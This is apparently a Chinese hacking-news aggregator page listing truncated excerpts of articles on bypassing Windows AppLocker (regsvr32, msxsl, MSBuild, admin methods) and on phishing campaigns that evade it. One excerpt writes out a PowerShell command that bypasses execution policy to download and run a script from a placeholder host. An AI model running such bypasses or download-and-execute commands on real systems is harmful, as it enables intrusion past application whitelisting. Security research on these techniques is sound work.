记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

通过regsrv32.exe绕过Applocker应用程序白名单的多种方法

在大型组织的安全领域中,AppLocker正在扮演越来越重要的角色。应用AppLocker规则可以显著降低企业的安全风险,AppLocker规则可以应用于目标应用,这些规则也是构成AppLocker策略的基本组件。AppLocker规则介绍规则集合(Rule Collection)AppLocker控制台以规则集合作为组织单元,这些集合包括可执行文件、脚本、Windows安装文件、封装的应用和应用安装包以及DLL文件。这些规则可以让我们轻松区分开不同类型的应用。规则条件(Rule Condition)规则条件可以帮助AppLocker识别哪些应用对应哪些规则。三个主要的规则条件分别为应用发布者、路径以及文件哈希。文件路
发布时间:2019-04-30 12:25 | 阅读:364792 | 评论:0 | 标签:Web安全 AppLocker

逃避手段再开花——从一个能逃避AppLocker和AMSI检测的Office文档讲起

介绍几天前,Cybaze-Yoroi ZLAB团队遇到了一个十分“异类”的Office文档,它当中包含的一些特性引起了研究人员的兴趣。文档中携带的payload能绕过Microsoft现今一些高级别的安全机制,如AppLocker(应用程序控制策略),或是较新版本的防恶意软件扫描接口AMSI——这是一个与供应商无关的安全接口,可以对运行的脚本、宏代码甚至内存块进行反病毒控制,旨在解决混淆和无文件威胁。因此,Cybaze-Yoroi ZLAB决定对检测样本进行更进一步的分析。技术分析表1.样本信息初始文档界面如下图所示,表面上是提示用户启用宏以显示文档的实际内容,实际上感染链已在后台悄悄启动。图1.初始文档界面几秒钟后,
发布时间:2019-03-22 12:20 | 阅读:564920 | 评论:0 | 标签:系统安全 AMSI AppLocker

如何以管理员身份绕过AppLocker

我认为,如果你是启用了AppLocker(“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能)的主机上的管理员,那么目前有两种不同技术可以用来绕过AppLocker。其中,使用GUI的第一种技术在我原先发布的一条推文中曾简单讨论过。这篇文章的目标是详细讨论这个曾经提到的技术,同时也为你提供另一种以前没有人提到过的绕过技术。需要注意的是,在这些绕过技术示例中,集中定义的AppLocker可执行如下规则(默认规则,没有管理规则)。其余的规则,则使用默认的AppLocker规则定义(* under Windows 以及 * under ProgramFiles)。使用GUI方式
发布时间:2019-02-25 12:20 | 阅读:451861 | 评论:0 | 标签:Web安全 AppLocker

如何利用msxsl绕过AppLocker?

Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代码,从而实现对Applocker的绕过。本文将要对这项技术进行介绍,分析可供进一步利用的方法,同时对其扩展。
发布时间:2017-07-14 01:50 | 阅读:98895 | 评论:0 | 标签:系统安全 AppLocker msxsl

针对蒙古政府的攻击所使用的钓鱼技术

翻译 c4bbage 微博 http://weibo.com/s4turnus 0x00 简介 FireEye 最近观察到一个针对蒙古政府个人的复杂攻击活动,个人目标感染了载有Posion Ivy shellcode 宏的 Microsoft Word 文档。Poison Ivy 是一个非常流行的远控工具,可以key logging、屏幕录制、密码窃取、文件传输、系统管理、流量重放等。这整个攻击的背后有一些有趣的技术,如下: * 根据被害人的个人资料自定义入侵 – 这个攻击团队使用已公开的白名单绕过技术来逃逸AppLocker * 无文件执行及权限持久 – 在这攻击中,攻击者经常师退避免将文件写入硬盘,来避免被检测和取证。我们观察到攻击者使用四个阶段的PS脚本,并没有将所有的payloa
发布时间:2017-02-26 01:55 | 阅读:119036 | 评论:0 | 标签:网络安全 applocker Microsoft Word 宏 Poison Ivy powershell 社会工程

Bypassing Applocker with MSBuild.exe

前一篇文章总结了几种bypass Applocker的方法,最近又在 @subTee 博客学到了新的方法,所以在这里进行一下简单的分享。 首先介绍一下MSBuild,MSBuild 是 Microsoft 和 Visual Studio的生成系统。默认是存在于windows系统上的。那么怎么使用msbuild执行我们的代码呢? 关于细节可以看这里: https://msdn.microsoft.com/en-us/library/dd722601.aspx @subTee 给出了几个POC。 Demo 测试Hello World: 以上文件保存为123.csproj,然后使用msbuild执行。如下图: 可以看到已经可以执行我们的代码了。 Execute PowerShell Commands 我们知道通过
发布时间:2016-09-23 13:20 | 阅读:93840 | 评论:0 | 标签:系统安全 applocker Bypassing MSBuild

AppLocker Bypass Techniques

from:https://www.youtube.com/watch?v=z04NXAkhI4k 0x00 Command 和 Powershell 没被禁用,脚本被禁用 1、直接使用cmd powershell执行 Powershell: IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') Command: powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') 2、管道 Powershell:Get-Content script.ps1 | iexCommand:cmd.exe /K &
发布时间:2016-09-20 21:35 | 阅读:134932 | 评论:0 | 标签:系统安全 applocker bypass powershell windows

Applocker:Windows网络保护之应用程序控制策略

应用白名单是一个很强大的技术,可以保护我们电脑免受未知的恶意软件的侵害,但它从来没有被真正地使用。其中一个主要原因是很难配置和维护,另一个则是有相当多的绕过技术,因此它无法很好的阻止那些被确定的攻击者。今天我们就来看看windows内置的AppLocker技术,它免费提供了一些基本功能。配置首先你需要启用相应的服务让AppLocker运行。通过GPO操作:Computer Configuration →Policies → Windows Settings → System Services把Application Identity服务设置为自动:然后去应用程序控制策略配置。其实有两种类型的白名单是可以用的——
发布时间:2016-01-24 18:30 | 阅读:77310 | 评论:0 | 标签:工具 网络安全 applocker windows

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云